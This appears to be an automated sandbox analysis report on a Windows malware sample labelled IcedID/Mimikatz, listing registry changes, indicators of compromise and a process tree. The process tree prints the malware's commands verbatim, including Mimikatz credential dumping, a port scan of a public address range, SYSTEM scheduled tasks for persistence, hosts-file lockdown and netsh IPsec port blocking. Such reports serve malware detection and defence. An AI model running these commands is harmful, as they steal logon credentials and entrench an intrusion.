\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aginbln.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language uedzbgtiz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 400 cmd.exe 3076 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x0008000000023473-6.dat nsis_installer_2 behavioral2/files/0x0008000000023488-15.dat nsis_installer_1 behavioral2/files/0x0008000000023488-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 45 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fmiclltfn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fmiclltfn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fmiclltfn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ aginbln.exe Key created \REGISTRY\USER\.DEFAULT\Software fmiclltfn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals fmiclltfn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fmiclltfn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fmiclltfn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fmiclltfn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" aginbln.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fmiclltfn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fmiclltfn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing aginbln.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" aginbln.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fmiclltfn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fmiclltfn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fmiclltfn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fmiclltfn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fmiclltfn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fmiclltfn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fmiclltfn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fmiclltfn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fmiclltfn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fmiclltfn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" aginbln.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" aginbln.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fmiclltfn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fmiclltfn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fmiclltfn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fmiclltfn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fmiclltfn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fmiclltfn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fmiclltfn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fmiclltfn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fmiclltfn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing fmiclltfn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fmiclltfn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fmiclltfn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fmiclltfn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fmiclltfn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fmiclltfn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fmiclltfn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fmiclltfn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fmiclltfn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fmiclltfn.exe -
Modifies registry class 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ aginbln.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3076 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4556 schtasks.exe 2036 schtasks.exe 3492 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 4556 2024-09-02_05c157a5d73589a64ccb83a1f5f5549d_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 4556 2024-09-02_05c157a5d73589a64ccb83a1f5f5549d_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 2932 aginbln.exe Token: SeDebugPrivilege 4824 aginbln.exe Token: SeDebugPrivilege 4260 vfshost.exe Token: SeDebugPrivilege 3036 fmiclltfn.exe Token: SeLockMemoryPrivilege 3872 unzsbd.exe Token: SeLockMemoryPrivilege 3872 unzsbd.exe Token: SeDebugPrivilege 3104 fmiclltfn.exe Token: SeDebugPrivilege 2656 fmiclltfn.exe Token: SeDebugPrivilege 2512 fmiclltfn.exe Token: SeDebugPrivilege 4504 fmiclltfn.exe Token: SeDebugPrivilege 3096 fmiclltfn.exe Token: SeDebugPrivilege 2816 fmiclltfn.exe Token: SeDebugPrivilege 4928 fmiclltfn.exe Token: SeDebugPrivilege 448 fmiclltfn.exe Token: SeDebugPrivilege 2448 fmiclltfn.exe Token: SeDebugPrivilege 1852 fmiclltfn.exe Token: SeDebugPrivilege 1272 fmiclltfn.exe Token: SeDebugPrivilege 2896 fmiclltfn.exe Token: SeDebugPrivilege 4620 fmiclltfn.exe Token: SeDebugPrivilege 1612 fmiclltfn.exe Token: SeDebugPrivilege 4280 fmiclltfn.exe Token: SeDebugPrivilege 1800 fmiclltfn.exe Token: SeDebugPrivilege 388 fmiclltfn.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 4556 2024-09-02_05c157a5d73589a64ccb83a1f5f5549d_hacktools_icedid_mimikatz.exe 4556 2024-09-02_05c157a5d73589a64ccb83a1f5f5549d_hacktools_icedid_mimikatz.exe 2932 aginbln.exe 2932 aginbln.exe 4824 aginbln.exe 4824 aginbln.exe 5068 xohudmc.exe 800 ogmqgi.exe 3960 aginbln.exe 3960 aginbln.exe 5900 aginbln.exe 5900 aginbln.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4556 wrote to memory of 400 4556 2024-09-02_05c157a5d73589a64ccb83a1f5f5549d_hacktools_icedid_mimikatz.exe 85 PID 4556 wrote to memory of 400 4556 2024-09-02_05c157a5d73589a64ccb83a1f5f5549d_hacktools_icedid_mimikatz.exe 85 PID 4556 wrote to memory of 400 4556 2024-09-02_05c157a5d73589a64ccb83a1f5f5549d_hacktools_icedid_mimikatz.exe 85 PID 400 wrote to memory of 3076 400 cmd.exe 88 PID 400 wrote to memory of 3076 400 cmd.exe 88 PID 400 wrote to memory of 3076 400 cmd.exe 88 PID 400 wrote to memory of 2932 400 cmd.exe 96 PID 400 wrote to memory of 2932 400 cmd.exe 96 PID 400 wrote to memory of 2932 400 cmd.exe 96 PID 4824 wrote to memory of 2560 4824 aginbln.exe 98 PID 4824 wrote to memory of 2560 4824 aginbln.exe 98 PID 4824 wrote to memory of 2560 4824 aginbln.exe 98 PID 2560 wrote to memory of 4396 2560 cmd.exe 100 PID 2560 wrote to memory of 4396 2560 cmd.exe 100 PID 2560 wrote to memory of 4396 2560 cmd.exe 100 PID 2560 wrote to memory of 4916 2560 cmd.exe 101 PID 2560 wrote to memory of 4916 2560 cmd.exe 101 PID 2560 wrote to memory of 4916 2560 cmd.exe 101 PID 2560 wrote to memory of 3816 2560 cmd.exe 102 PID 2560 wrote to memory of 3816 2560 cmd.exe 102 PID 2560 wrote to memory of 3816 2560 cmd.exe 102 PID 2560 wrote to memory of 3052 2560 cmd.exe 103 PID 2560 wrote to memory of 3052 2560 cmd.exe 103 PID 2560 wrote to memory of 3052 2560 cmd.exe 103 PID 2560 wrote to memory of 4632 2560 cmd.exe 104 PID 2560 wrote to memory of 4632 2560 cmd.exe 104 PID 2560 wrote to memory of 4632 2560 cmd.exe 104 PID 2560 wrote to memory of 2488 2560 cmd.exe 105 PID 2560 wrote to memory of 2488 2560 cmd.exe 105 PID 2560 wrote to memory of 2488 2560 cmd.exe 105 PID 4824 wrote to memory of 2052 4824 aginbln.exe 109 PID 4824 wrote to memory of 2052 4824 aginbln.exe 109 PID 4824 wrote to memory of 2052 4824 aginbln.exe 109 PID 4824 wrote to memory of 452 4824 aginbln.exe 111 PID 4824 wrote to memory of 452 4824 aginbln.exe 111 PID 4824 wrote to memory of 452 4824 aginbln.exe 111 PID 4824 wrote to memory of 4868 4824 aginbln.exe 113 PID 4824 wrote to memory of 4868 4824 aginbln.exe 113 PID 4824 wrote to memory of 4868 4824 aginbln.exe 113 PID 4824 wrote to memory of 1800 4824 aginbln.exe 117 PID 4824 wrote to memory of 1800 4824 aginbln.exe 117 PID 4824 wrote to memory of 1800 4824 aginbln.exe 117 PID 1800 wrote to memory of 4576 1800 cmd.exe 119 PID 1800 wrote to memory of 4576 1800 cmd.exe 119 PID 1800 wrote to memory of 4576 1800 cmd.exe 119 PID 4576 wrote to memory of 3656 4576 wpcap.exe 120 PID 4576 wrote to memory of 3656 4576 wpcap.exe 120 PID 4576 wrote to memory of 3656 4576 wpcap.exe 120 PID 3656 wrote to memory of 5012 3656 net.exe 122 PID 3656 wrote to memory of 5012 3656 net.exe 122 PID 3656 wrote to memory of 5012 3656 net.exe 122 PID 4576 wrote to memory of 4168 4576 wpcap.exe 123 PID 4576 wrote to memory of 4168 4576 wpcap.exe 123 PID 4576 wrote to memory of 4168 4576 wpcap.exe 123 PID 4168 wrote to memory of 3352 4168 net.exe 125 PID 4168 wrote to memory of 3352 4168 net.exe 125 PID 4168 wrote to memory of 3352 4168 net.exe 125 PID 4576 wrote to memory of 1432 4576 wpcap.exe 126 PID 4576 wrote to memory of 1432 4576 wpcap.exe 126 PID 4576 wrote to memory of 1432 4576 wpcap.exe 126 PID 1432 wrote to memory of 1408 1432 net.exe 128 PID 1432 wrote to memory of 1408 1432 net.exe 128 PID 1432 wrote to memory of 1408 1432 net.exe 128 PID 4576 wrote to memory of 788 4576 wpcap.exe 129
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2108
-
C:\Windows\TEMP\zfdehzegb\unzsbd.exe"C:\Windows\TEMP\zfdehzegb\unzsbd.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3872
-
-
C:\Users\Admin\AppData\Local\Temp\2024-09-02_05c157a5d73589a64ccb83a1f5f5549d_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-09-02_05c157a5d73589a64ccb83a1f5f5549d_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4556 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\ihguignb\aginbln.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:400 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3076
-
-
C:\Windows\ihguignb\aginbln.exeC:\Windows\ihguignb\aginbln.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2932
-
-
-
C:\Windows\ihguignb\aginbln.exeC:\Windows\ihguignb\aginbln.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4824 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2560 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4396
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:4916
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3816
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:3052
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4632
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:2488
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2052
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:452
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4868
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\wcbiqigng\imbbbzfne\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Windows\wcbiqigng\imbbbzfne\wpcap.exeC:\Windows\wcbiqigng\imbbbzfne\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4576 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:3656 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:5012
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:4168 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:3352
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1432 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:1408
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:788 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:1004
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:1396
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:4916 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:4220
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:2488
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:3552 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:3280
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\wcbiqigng\imbbbzfne\nhkqndyng.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\wcbiqigng\imbbbzfne\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:440 -
C:\Windows\wcbiqigng\imbbbzfne\nhkqndyng.exeC:\Windows\wcbiqigng\imbbbzfne\nhkqndyng.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\wcbiqigng\imbbbzfne\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2816
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\wcbiqigng\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\wcbiqigng\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:112 -
C:\Windows\wcbiqigng\Corporate\vfshost.exeC:\Windows\wcbiqigng\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4260
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "gfbbgwyue" /ru system /tr "cmd /c C:\Windows\ime\aginbln.exe"2⤵
- System Location Discovery: System Language Discovery
PID:4412 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2532
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "gfbbgwyue" /ru system /tr "cmd /c C:\Windows\ime\aginbln.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:3492
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "whinbeufb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ihguignb\aginbln.exe /p everyone:F"2⤵PID:4848
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:212
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "whinbeufb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ihguignb\aginbln.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
PID:4556
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bltebicig" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\zfdehzegb\unzsbd.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:3320 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2576
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "bltebicig" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\zfdehzegb\unzsbd.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2036
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:452
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3496
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2212
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2896
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1408
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3600
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1004
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3300
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2672
-
-
